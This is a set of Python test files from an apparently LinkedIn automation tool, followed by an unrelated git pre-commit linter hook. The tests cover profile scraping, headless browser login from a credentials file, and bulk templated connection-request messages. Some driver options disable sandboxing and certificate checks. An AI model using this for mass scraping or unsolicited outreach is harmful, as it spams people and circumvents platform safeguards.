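A short, hedged sketch of how Person_Info above might be used to dump a scraped profile to disk. The import path follows the `linkedin/person/__init__.py` layout shown in the file header; the profile values and the output filename are placeholders, and no real Selenium element is attached.
```python
from linkedin.person import Person_Info

person = Person_Info(
    name="Ada Lovelace",
    occupation="Software Engineer",
    profile_url="https://www.linkedin.com/in/ada-lovelace-123/",
    photo_url="https://media.licdn.com/photo.jpg?size=200",
    location="London",
    summary="Works on analytical engines.",
    connect_button=None)

print(person.first_name, person.last_name)  # split by nameparser
print(person.photo_url)                     # query string stripped off

# freeze() serialises the object; "raw" writes a simple key: value dump.
person.freeze(file="ada.txt", mode="w", _format="raw")
```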
#### File: test_lib/test_utils/test_figlet.py
```python
from __future__ import annotations
import unittest
from unittest.mock import Mock
from unittest.mock import patch
from lib.utils.figlet import CreateFigletString
class TestCreateFigletFunction(unittest.TestCase):
@patch("pyfiglet.figlet_format")
def test_createfigletstring_function_with_one_parameter(
self: TestCreateFigletFunction,
mock_figlet_format: Mock
) -> None:
kwargs = {}
CreateFigletString("inb")
mock_figlet_format.assert_called_with(
text="inb", font="standard", **kwargs)
@patch("pyfiglet.figlet_format")
def test_createfigletstring_function_with_two_parameters(
self: TestCreateFigletFunction,
mock_figlet_format: Mock
) -> None:
kwargs = {}
CreateFigletString("inb", font="slant")
mock_figlet_format.assert_called_with(
text="inb", font="slant", **kwargs)
```
#### File: test_lib/test_utils/test_validator.py
```python
from __future__ import annotations
import os
import stat
import unittest
from lib import DRIVER_PATH
from lib.utils.validator import Validator
class TestValidatorClass(unittest.TestCase):
def test_validator_error_code(self: TestValidatorClass) -> None:
self.assertEqual(Validator.ERROR_INVALID_NAME, 123)
def test_validator_constructor_exception(
self: TestValidatorClass) -> None:
different_types = [10, 10.19, [1, 2, 3, 4],
["abc", "bcd", "cdb"], {"name": "ayush"}]
        for value in different_types:
            with self.assertRaises(ValueError):
                Validator(value)
def test_validator_constructor(self: TestValidatorClass) -> None:
validator = Validator("https://www.linkedin.com/")
self.assertEqual(validator._field, "https://www.linkedin.com/")
def test_validator_is_url_method(self: TestValidatorClass) -> None:
self.assertTrue(Validator("http://www.linkedin.com/").is_url())
self.assertTrue(Validator("https://www.linkedin.com/").is_url())
self.assertTrue(Validator("ftp://www.linkedin.com/").is_url())
self.assertTrue(Validator("ftps://www.linkedin.com/").is_url())
self.assertTrue(Validator(
"https://www.linkedin.com/in/ornela-cerenishti-118400146/").is_url())
self.assertFalse(Validator("notavalidurl").is_url())
self.assertFalse(
Validator("/ornela-cerenishti-118400146/").is_url())
def test_validator_is_email_method(
self: TestValidatorClass) -> None:
self.assertTrue(Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertFalse(Validator("@gmail.com").is_email())
self.assertFalse(Validator(".com@gmail").is_email())
def test_validator_is_path_method(self: TestValidatorClass) -> None:
self.assertTrue(Validator(os.path.abspath(__file__)).is_path())
@unittest.skipIf(not os.getuid() == 0,
"Cannot alter permissions without root!")
def test_validator_is_executable_method(
self: TestValidatorClass) -> None:
original_file_permissions = stat.S_IMODE(
os.lstat(DRIVER_PATH).st_mode)
        def add_execute_permissions(path):
            """Add execute permissions to this path, while keeping all other
            permissions intact.
            Params:
                path: The path whose permissions to alter.
            """
ADD_USER_EXECUTE = stat.S_IXUSR
ADD_GROUP_EXECUTE = stat.S_IXGRP
ADD_OTHER_EXECUTE = stat.S_IXOTH
ADD_EXECUTE = ADD_USER_EXECUTE | ADD_GROUP_EXECUTE | ADD_OTHER_EXECUTE
current_permissions = stat.S_IMODE(os.lstat(path).st_mode)
os.chmod(path, current_permissions | ADD_EXECUTE)
add_execute_permissions(DRIVER_PATH)
self.assertTrue(Validator(DRIVER_PATH).is_executable())
        def remove_execute_permissions(path):
            """Remove execute permissions from this path, while keeping all other
            permissions intact.
            Params:
                path: The path whose permissions to alter.
            """
NO_USER_EXECUTE = ~stat.S_IXUSR
NO_GROUP_EXECUTE = ~stat.S_IXGRP
NO_OTHER_EXECUTE = ~stat.S_IXOTH
NO_EXECUTE = NO_USER_EXECUTE & NO_GROUP_EXECUTE & NO_OTHER_EXECUTE
current_permissions = stat.S_IMODE(os.lstat(path).st_mode)
os.chmod(path, current_permissions & NO_EXECUTE)
remove_execute_permissions(DRIVER_PATH)
self.assertFalse(Validator(DRIVER_PATH).is_executable())
# place the original file permissions back
os.chmod(DRIVER_PATH, original_file_permissions)
```
#### File: test_lib/test_utils/test_window.py
```python
from __future__ import annotations
import unittest
from unittest.mock import Mock
from unittest.mock import patch
from lib import Terminal
class TestTerminalClass(unittest.TestCase):
def setUp(self: TestTerminalClass) -> None:
self.t = Terminal()
@patch("sys.stdout.write")
def test_setcursorposition_method_with_valid_x_and_y(
self: TestTerminalClass, mock_stdout_write: Mock) -> None:
self.t.setcursorposition(10, 10)
mock_stdout_write.assert_called_with("%c[%d;%df" % (0x1B, 10, 10))
def test_getcursorposition_method(self: TestTerminalClass) -> None:
(x, y) = self.t.getcursorposition()
self.assertIsInstance(x, int)
self.assertIsInstance(y, int)
```
#### File: test_linkedin/connect/test_linkedinsearchconnect.py
```python
from __future__ import annotations
import os
import json
import unittest
from unittest.mock import Mock
from unittest.mock import patch
from lib import ping
from errors import ConnectionLimitExceededException
from linkedin import Driver
from linkedin.DOM import JS
from linkedin.login import LinkedIn
from linkedin.connect import LinkedInSearchConnect
@unittest.skipUnless(ping("linkedin.com"),
"linkedin.com server not responding")
class TestLinkedInSearchConnectClass(unittest.TestCase):
def setUp(self: TestLinkedInSearchConnectClass) -> None:
creds_abspath_ = os.path.dirname(
os.path.abspath(__file__)) + "/../../creds/creds.json"
with open(creds_abspath_, "r") as f:
data = json.load(f)
chrome_driver_options = []
chrome_driver_options.append(Driver.HEADLESS)
chrome_driver_options.append(
Driver.DEFAULT_HEADLESS_WINDOW_SIZE)
self.linkedin = LinkedIn(
user_email=data["user_email"],
user_password=data["<PASSWORD>"],
driver_path=data["driver_path"],
opt_chromedriver_options=chrome_driver_options)
def test_constructor_method_with_invalid_driver_instance_type(
self: TestLinkedInSearchConnectClass) -> None:
invalid_objs = [
1, "ayush", [1, 2, 3, 4],
{1: "ayush", 2: "mohika"}]
for obj in invalid_objs:
with self.assertRaises(TypeError):
linkedinsearchconnect = LinkedInSearchConnect(obj)
def test_contructor_method_with_invalid_limit_number(
self: TestLinkedInSearchConnectClass) -> None:
with self.assertRaises(ConnectionLimitExceededException):
linkedinsearchconnect = LinkedInSearchConnect(
self.linkedin.driver, limit=100)
@patch("linkedin.DOM.JS.scroll_bottom")
@patch("linkedin.DOM.JS.get_page_y_offset")
def test_private_method_scroll(self: TestLinkedInSearchConnectClass,
mock_js_get_page_y_offset: Mock,
mock_js_scroll_bottom: Mock) -> None:
linkedinsearchconnect = LinkedInSearchConnect(
self.linkedin.driver)
linkedinsearchconnect._scroll()
mock_js_get_page_y_offset.assert_called()
mock_js_scroll_bottom.assert_called()
```
#### File: test_linkedin/message/test_template.py
```python
from __future__ import annotations
import unittest
from errors import TemplateFileException
from linkedin.message import Template
Template_Business = """Hi {{name}},
I'm looking to expand my network with fellow business owners and professionals. I would love to learn about what you do and see
if there's any way we can support each other.
Cheers!"""
Template_Sales = """Hi {{name}},
I'm looking to connect with like-minded professionals specifically who are on the revenue generating side of things.
Let's connect!"""
Template_Real_Estate = """Hey {{name}},
Came across your profile and saw your work in real estate. I'm reaching out to connect with other like-minded people. Would be
happy to make your acquaintance.
Have a good day!"""
Template_Creative_Industry = """Hi {{name}},
LinkedIn showed me your profile multiple times now, so I checked what you do. I really like your work and as we are both in the
creative industy - I thought I'll reach out. It's always great to be connected with like-minded individuals, isn't it?
{{my_name}}"""
Template_Hr = """Hey {{name}},
I hope your week is off to a great start, I noticed we both work in the HR/Employee Experience field together.
I would love to connect with you."""
Template_Include_Industry = """Hi {{name}},
I hope you're doing great! I'm on a personal mission to grow my connections on LinkedIn, especially in the field of {{industry}}.
So even though we're practically strangers, I'd love to connect with you.
Have a great day!"""
Template_Ben_Franklin = """Hi {{name}},
The Ben Franklin effect - when we do a person a favor, we tend to like them more as a result. Anything I can do for you?
Best, {{my_name}}"""
Template_Virtual_Coffee = """Hi {{name}},
I hope you're doing well. I'm {{my_name}}, {{my_position}} of {{my_company_name}}. We're looking for {{position}} and it would be
great to connect over a 'virtual' coffee/chat and see what we can do together?"""
Template_Common_Connection_Request = [
"""Hey {{name}},
I notice we share a mutual connection or two & would love to add you to my network of professionals.
If you're open to that let's connect!""",
"""Hi {{name}},
I see we have some mutual connections. I always like networking with new people, and thought this would be an easy way for us to
introduce ourselves.""",
"""Hi {{name}},
Life is both long and short. We have quite a few mutual connections. I would like to invite you to join my network on LinkedIn
platform. Hopefully, our paths will cross professionally down the line. Until then, wishing you and yours an incredible {{year}}.
{{my_name}}""",
"""Hi {{name}},
I was looking at your profile and noticed we had a few shared connections. I thought it would be nice to reach out to connect with
you and share out networks.
Thank you and hope all is well!""",
"""Hey {{first_name}},
I saw you're based in {{location}} and work on {{keyword}}, I'd love to connect.
Thanks, {{my_name}}"""
]
class TestTemplateApi(unittest.TestCase):
def test_static_method_get_template_by_name(
self: TestTemplateApi) -> None:
template = Template(
None, var_template=None, grammar_check=False,
use_template='template_ben_franklin')
self.assertEqual(template.get_template_by_name(
'template_ben_franklin'), Template_Ben_Franklin)
self.assertEqual(template.get_template_by_name(
'template_business'), Template_Business)
self.assertEqual(template.get_template_by_name(
'template_sales'), Template_Sales)
self.assertEqual(template.get_template_by_name(
'template_real_estate'), Template_Real_Estate)
self.assertEqual(template.get_template_by_name(
'template_creative_industry'),
Template_Creative_Industry)
self.assertEqual(
template.get_template_by_name('template_hr'),
Template_Hr)
self.assertEqual(template.get_template_by_name(
'template_include_industry'),
Template_Include_Industry)
self.assertEqual(template.get_template_by_name(
'template_virtual_coffee'), Template_Virtual_Coffee)
for i in range(5):
self.assertEqual(
template.get_template_by_name(
'template_common_connection_request')[i],
Template_Common_Connection_Request[i])
with self.assertRaises(TemplateFileException):
template.get_template_by_name('any_unknown_template')
def test_method_parse_with_template_business(
self: TestTemplateApi) -> None:
template = Template(None, var_template=None,
use_template='template_business',
grammar_check=False)
template.set_data({
'name': 'Ayush',
})
template_business = Template_Business.replace(
'{{name}}', 'Ayush')
self.assertEqual(template.parse(), template_business)
```
#### File: tests/test_linkedin/test_driver.py
```python
from __future__ import annotations
import os
import stat
import unittest
from unittest.mock import call
from unittest.mock import Mock
from unittest.mock import patch
from linkedin import Driver
from lib import DRIVER_PATH
from errors import WebDriverPathNotGivenException
from errors import WebDriverNotExecutableException
class TestDriverClass(unittest.TestCase):
@unittest.skipIf(not os.getuid() == 0, "Requires root privileges!")
def test_constructor_method_with_invalid_executable_path(
self: TestDriverClass) -> None:
paths = [1, (1, 2, 3), [1, 2, 3], {1: 1, 2: 2}]
for path in paths:
with self.assertRaises(WebDriverPathNotGivenException):
driver = Driver(path)
original_file_permissions = stat.S_IMODE(
os.lstat(DRIVER_PATH).st_mode)
        def remove_execute_permissions(path):
            """Remove execute permissions from this path, while keeping all other
            permissions intact.
            Params:
                path: The path whose permissions to alter.
            """
NO_USER_EXECUTE = ~stat.S_IXUSR
NO_GROUP_EXECUTE = ~stat.S_IXGRP
NO_OTHER_EXECUTE = ~stat.S_IXOTH
NO_EXECUTE = NO_USER_EXECUTE & NO_GROUP_EXECUTE & NO_OTHER_EXECUTE
current_permissions = stat.S_IMODE(os.lstat(path).st_mode)
os.chmod(path, current_permissions & NO_EXECUTE)
remove_execute_permissions(DRIVER_PATH)
with self.assertRaises(WebDriverNotExecutableException):
driver = Driver(driver_path=DRIVER_PATH)
# place the original file permissions back
os.chmod(DRIVER_PATH, original_file_permissions)
@patch("linkedin.Driver.enable_webdriver_chrome")
def test_constructor_method_with_valid_chromedriver_path(self: TestDriverClass, mock_enable_webdriver_chrome: Mock) -> None:
driver = Driver(driver_path=DRIVER_PATH)
mock_enable_webdriver_chrome.assert_called()
@patch("selenium.webdriver.ChromeOptions.add_argument")
def test_constructor_method_add_argument_internal_calls(
self: TestDriverClass, mock_add_argument: Mock) -> None:
calls = [
call(Driver.HEADLESS),
call(Driver.INCOGNITO),
call(Driver.NO_SANDBOX),
call(Driver.DISABLE_GPU),
call(Driver.START_MAXIMIZED),
call(Driver.DISABLE_INFOBARS),
call(Driver.ENABLE_AUTOMATION),
call(Driver.DISABLE_EXTENSIONS),
call(Driver.DISABLE_NOTIFICATIONS),
call(Driver.DISABLE_SETUID_SANDBOX),
call(Driver.IGNORE_CERTIFICATE_ERRORS)]
driver = Driver(driver_path=DRIVER_PATH, options=[
Driver.HEADLESS, Driver.INCOGNITO, Driver.NO_SANDBOX, Driver.DISABLE_GPU, Driver.START_MAXIMIZED,
Driver.DISABLE_INFOBARS, Driver.ENABLE_AUTOMATION, Driver.DISABLE_EXTENSIONS, Driver.DISABLE_NOTIFICATIONS,
Driver.DISABLE_SETUID_SANDBOX, Driver.IGNORE_CERTIFICATE_ERRORS])
mock_add_argument.assert_has_calls(calls)
``` |
{
"source": "joshi-bharat/linter",
"score": 3
} |
#### File: joshi-bharat/linter/git_hooks.py
```python
from __future__ import print_function
import os
import subprocess
import sys
def run_command_in_folder(command, folder):
"""Run a bash command in a specific folder."""
run_command = subprocess.Popen(command,
shell=True,
cwd=folder,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, _ = run_command.communicate()
command_output = stdout.rstrip()
return command_output
def get_git_repo_root(some_folder_in_root_repo='./'):
"""Get the root folder of the current git repository."""
return run_command_in_folder('git rev-parse --show-toplevel',
some_folder_in_root_repo)
def get_linter_folder(root_repo_folder):
"""Find the folder where this linter is stored."""
try:
return os.environ['LINTER_PATH']
except KeyError:
print("Cannot find linter because the environment variable "
"LINTER_PATH doesn't exist.")
sys.exit(1)
def main():
# Get git root folder.
repo_root = get_git_repo_root()
# Get linter subfolder
linter_folder = get_linter_folder(repo_root)
# Append linter folder to the path so that we can import the linter module.
linter_folder = os.path.join(repo_root, linter_folder)
sys.path.append(linter_folder)
import linter
linter.linter_check(repo_root, linter_folder)
if __name__ == "__main__":
main()
``` |
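The hook script above expects to be invoked by git with `LINTER_PATH` exported in the environment. Below is a hedged sketch of wiring it in as a `pre-commit` hook; the repository path and the `linter` folder name are placeholders, and the environment variable still has to be exported in whatever shell git runs in.
```python
import os

# Placeholder paths -- adjust to the actual checkout.
repo_root = "/path/to/your/repo"
hook_script = os.path.join(repo_root, "linter", "git_hooks.py")
hook_link = os.path.join(repo_root, ".git", "hooks", "pre-commit")

# Symlink git_hooks.py as the pre-commit hook so linter_check() runs on every commit.
if not os.path.islink(hook_link) and not os.path.exists(hook_link):
    os.symlink(hook_script, hook_link)

# get_linter_folder() reads LINTER_PATH, so it must also be exported where git runs,
# e.g. `export LINTER_PATH=linter` in the shell profile.
```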